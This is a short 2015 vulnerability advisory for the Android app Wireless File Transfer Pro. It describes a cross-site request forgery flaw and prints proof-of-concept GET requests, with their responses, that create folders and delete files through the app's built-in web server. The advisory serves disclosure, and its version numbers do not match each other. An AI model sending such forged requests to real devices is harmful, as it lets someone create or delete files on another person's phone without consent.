Document Title: =============== Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Creat, Delete) Release Date: ============= 2015-02-10 Product & Service Introduction: =============================== Wireless File Transfer Pro is the advanced version of Wireless File Transfer. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro ) Affected Product(s): ==================== Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1 Lextel Technology Exploitation Technique: ======================= Remote Severity Level: =============== Medium Request Method(s): [+] [GET] Vulnerable Module(s): [+] browse Vulnerable Parameter(s): [+] fileExplorer.html? Affected Module(s): [+] Index of Documents (http://localhost:8888) Technical Details & Description: ================================ cross site request forgery has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. Proof of Concept (PoC): ======================= Creat New Folder --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 test12015-02-09 18:12:19 Delete File, Folder --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 30 Reference: http://localhost:8888/ Security Risk: ============== The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr